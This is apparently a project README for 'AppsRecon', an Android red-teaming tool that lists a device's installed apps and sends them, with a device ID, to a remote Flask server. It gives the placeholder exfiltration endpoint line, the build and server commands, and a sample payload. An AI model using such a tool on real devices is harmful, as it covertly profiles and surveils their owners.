AppsRecon is a lightweight Android reconnaissance tool designed to enumerate installed apps on a target device and send them to a remote Flask server for analysis. Ideal for red teaming, CTFs, and controlled offensive environments.
- Retrieves all installed package names from the device.
- Identifies and separates system (default) apps from user-installed apps.
- Sends results to a remote Flask server over HTTP.
- Includes unique device ID for per-device tracking.
- Flask server logs apps in color-coded format and stores them in separate files.
- Clone the project and open it in Android Studio.
- Update the Flask server IP in
SendPackages.kt:.baseUrl("http://<YOUR-IP>:1337/") - Build and run the APK on a real device or emulator (make sure it has the QUERY_ALL_PACKAGES permission).
If using HTTP, ensure networkSecurityConfig allows cleartext traffic.
- Install dependencies:
pip3 install -r requirements.txt- Run the server:
python3 server.pyThe Flask server will:
- Print all received packages.
- Color system apps in green, user-installed in red.
- Save results to:
<device_id>_defaultApps.txt<device_id>_installedApps.txt
{
"id": "ea94a4c1f08b123f",
"packages": [
"com.android.settings",
"com.whatsapp",
"com.termux"
]
}This tool is intended only for educational purposes, research, and ethical hacking in controlled environments. The author is not responsible for any misuse.